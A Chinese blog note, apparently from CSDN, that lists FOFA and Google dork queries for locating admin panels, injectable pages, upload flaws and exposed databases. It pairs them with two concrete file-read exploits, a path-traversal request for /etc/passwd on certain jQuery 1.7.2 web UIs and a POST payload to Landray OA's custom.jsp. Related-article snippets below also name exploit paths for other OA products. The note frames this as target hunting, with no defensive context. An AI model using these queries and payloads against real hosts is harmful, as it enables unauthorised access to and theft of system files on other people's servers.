FOFA搜索语法笔记

最新推荐文章于 2024-05-23 08:00:00 发布
最新推荐文章于 2024-05-23 08:00:00 发布
阅读量4.7k 收藏 3
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011975363/article/details/118106345
版权

fofa: body=“webui/js/jquerylib/jquery-1.7.2.min.js”
构造访问 /webui/?g=sys_dia_data_down&file_name=…/etc/passwd

inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
查找文本内容:
site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username

  • title=“后台管理”
  • app=“Redis”

查找可注入点:site:域名 inurl:aspx|jsp|php|asp

查找上传漏洞:site:域名 inurl:file|load|editor|Files
找eweb编辑器:
site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit
存在的数据库:site:域名 filetype:mdb|asp|#
查看脚本类型:site:域名 filetype:asp/aspx/php/jsp
迂回策略入侵:inurl:cms/data/templates/images/index/

蓝凌OA任意文件读取漏洞

  • fofa :app=“Landray-OA系统”
  • 漏洞的路径在 xxxxx/sys/ui/extend/varkind/custom.jsp下面,也就是custom.jsp里面,需要使用post请求方式,请求的参数为 var={“body”:{“file”:“file:///etc/passwd”}}
小心灵呀
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jQuery-1.7.2版本存在任意文件读取漏洞
nnn2188185的博客
04-23 1763
jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。
谷歌/FOFA搜索引擎使用
莫黎小天
01-21 3853
谷歌搜索引擎的使用 1.谷歌语法 利用搜索引擎在渗透测试过程搜索到特定页面的一种语法 “xxx” :将要搜索的关键字用引号括起来(表示完全匹配,即关键词不能分开,顺序也不能变) +:“xxx” +baidu.com 搜索xxx与baidu.com相关的内容 -: “xxx”-baidu.com 搜索结果里面除去baidu.com相关的内容 2.谷歌语法基础使用 site:指定域名,如:site:edu.cn inurl:用于搜索包含的url关键词的网页,如:inurl:login 搜索
任意文件读取/下载漏洞
最新发布
qq_68163788的博客
05-23 2281
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入中插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
[ 漏洞挖掘基础篇四 ] 漏洞挖掘之 SQL 注入挖掘
qq_51577576的博客
06-01 3506
sql 注入挖掘
【精选】小白是如何挖漏洞的(技巧篇)
2301_80127209的博客
10-14 259
这时候就是要靠我们万能的 fofa 了,首先我们要知道有哪些 cms 有漏洞这里大家可以去找网上的漏洞库,里面一般都会有漏洞合集和这里我稍后会给大家推荐一两个看到没有,就是这么多cms,一杀一个准,上分必备漏洞当然很多漏洞都不能一步到位的,当然也有很多是可以给我们刷分的不过是否重复提交,这我就不太清楚了,可以给你们看看我的战果!当然,没审核,能重复几个我就不知道了,一切随缘—-这里随便找一个cms,给你们看看就这cms,信息泄露,你看,多香!,而且这个漏洞是直接把poc打上去就行了!
任意文件下载漏洞
L_lemo004的博客
09-22 4115
文章目录任意文件下载0x01 漏洞介绍0x02 漏洞产生原因0x03 漏洞发现Google search一般链接形式包含参数利用方法WEB-INF0x04 漏洞绕过0x05 漏洞利用常见利用文件路径WindowsLinux0x06 漏洞判断0x07 漏洞验证0x08 漏洞防护通用文件下载漏洞修复0x09 文件路径汇总任意文件读取漏洞漏洞产生原因任意文件读取文件读取函数漏洞验证任意文件读取验证 任意文件下载 0x01 漏洞介绍 一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户
FofaViewer佛法批量搜索爬虫工具
02-28
FofaViewer,又被称为“佛法”,是一款在网络安全领域广泛使用的批量搜索爬虫工具。它以其高效的数据抓取能力和强大的网络资产发现功能,深受广大安全研究人员和渗透测试人员的喜爱。这款工具的核心特性是通过FOFA...
twnanda.github.io:台南佛法页
02-09
【twnanda.github.io:台南佛法页】是一个基于HTML技术构建的在线平台,专注于分享台南地区的佛法信息。这个网站可能是由个人或者团队通过GitHub Pages服务托管的,利用了开源的Git仓库管理工具GitHub来发布和更新...
佛法行情「Dharma Quotes」-crx插件
03-12
每当您打开一个新标签时,请阅读法律报价。 来自所有佛教传统的老师的名言。 1.0.0版具有全新的大小调整逻辑,可提供完全响应的体验,还有超过1700个引号。0.5.0版具有更好的逻辑来调整文本大小和近900个引号。...
纯闻法师:佛法与企业文化.pdf
10-22
纯闻法师:佛法与企业文化.pdf
relayer-starter-kit:在佛法上启动您自己的中继器
04-27
什么是佛法? Dharma是一种开放的,未经许可的协议,使任何人都可以在以太坊区块链上进行基于信用的交易。 在这里阅读更多。 什么是佛法中继器? 中继器是佛法网络上流动性的来源。 它将借款人与贷方联系起来。 ...
jQuery-1.7.2存在任意文件读取漏洞
fly夏天的博客
12-27 822
文章复现了jQuery-1.7.2存在任意文件读取漏洞。并提供了简单的利用方法
Web>信息泄露
Ynh323的博客
04-24 165
目录 目录遍历 PHPINFO 备份文件下载 1.网站源码 2. bak文件 3. vim缓存 4..DS._Store 目录遍历 题目1: 解题步骤: 1.挨着,一个一个看,最后某一目录发现了flag.txt文件 PHPINFO 题目: 解题步骤: 1.之后在PHP Variables分类下的$_ENV["FLAG"]找到flag 备份文件下载 1.网站源码 题目: 解题步骤: 1. 在URL输入: htt...
【渗透整理】SQL注入篇(1)
SunnyCat
12-24 627
【渗透整理】DVWA SQL Injection (Blind) —等级:low DVWA可以自己搭建在本地主机进行学习测试(burp suite本地抓包的时候需要把127.0.0.1的默认不截取取消,否则自己抓不到自己,踩坑铭记),如果不想麻烦的话可以直接网上搜索人家搭建好的DVWA平台来使用,省时省力,还能看见很多的“道友”遗留的痕迹。 1、寻找测试主机: 网站 fafo.so 打开搜索DVW...
【WEB安全】SQL注入挖掘
信安是不可或缺的一部分!
02-18 1745
2021年OWASP发布漏洞威胁榜单,SQL注入从第一名下降到第三(https://owasp.org/Top10/),SQL注入是一种常见的Web攻击技术,通过构造恶意的SQL语句来破坏数据库安全。攻击者可以通过提交带有恶意代码的输入,例如网页表单,来控制数据库执行恶意语句。这样,攻击者可以访问敏感信息,修改数据,甚至删除整个数据库。为了防范SQL注入攻击,开发人员应该使用参数化查询或存储过程,并对用户输入进行严格的验证和过滤。这样可以确保用户输入不会被作为恶意代码注入到数据库中。
编程代码:大神教你如何进行渗透测试
C语言C++学习俱乐部:765860056
12-27 3546
使用关键词得到目标源码 前言:对某网站进行渗透测试,此次渗透给的是一个主域名,并且也没有子域,打开了目标网站先对其进行一波信息收集 中间件: IIS 8.5 输入admin发现自动添加了/ 说明其目录存在,那么盲猜一波文件,login.aspx default.aspx main.aspx 等等 最终在login.aspx下面发现后台登录页面。这不猜他一波弱口令?? 一顿操作过后账号被锁 熟悉的开局,既然如此只能尝试其他方法了。 在主页的html代...
【漏洞复现】 蓝凌OA treexml.tmpl 远程命令执行漏洞
qq_34914659的博客
06-14 3062
【漏洞复现】 蓝凌OA treexml.tmpl 远程命令执行漏洞
[漏洞挖掘]SRC-泛微OA文件上传
wwxxee
05-19 4029
SRC–泛微OA任意文件上传 泛微OA weaver.common.Ctrl 任意文件上传漏洞 存在漏洞的路径为: /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp 首页: 请求包: FOFA: app=“泛微-协同办公OA” && is_domain=true 普通注册会员只能获取5页信息。 有FOFA会员可以直接通过API请求拿到I
请阐释唐僧师徒四人西游取经的可行性,以及阐释如来佛祖进行“西游项目“决策时所考虑的因素。
03-29
唐僧师徒四人西游取经的可行性: 1. 地理位置:西天取经的路途遥远,需要跨越多个国家和地区,但是唐僧师徒四人在历经千辛万苦后,最终到达了目的地。 2. 精神力量:唐僧师徒四人有着顽强的毅力和不屈的精神力量,即使在遇到各种困难和危险的情况下,他们也能够坚持下去。 3. 团结合作:唐僧师徒四人之间相互协作,有着很强的团结精神,互相帮助,共同克服了前进中的各种困难。 4. 信仰和使命感:唐僧作为佛教的信徒,带领三个徒弟前往西天取经,是他们的信仰和使命感的体现。 如来佛祖进行“西游项目“决策时所考虑的因素: 1. 世界和平:佛祖希望通过唐僧师徒四人的西天取经之行,传播佛法,帮助世界实现和平。 2. 教化人心:佛祖希望通过西天取经这一活动,教化人心,让人们遵循佛法的教义,实现心灵的净化。 3. 师徒关系:佛祖与唐僧师徒四人之间有着师徒关系,希望通过这一行动,让唐僧师徒四人更好地学习佛法。 4. 达成目标:佛祖希望通过西天取经之行,达成他们的目标,即获取真经,以便更好地教化人们。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值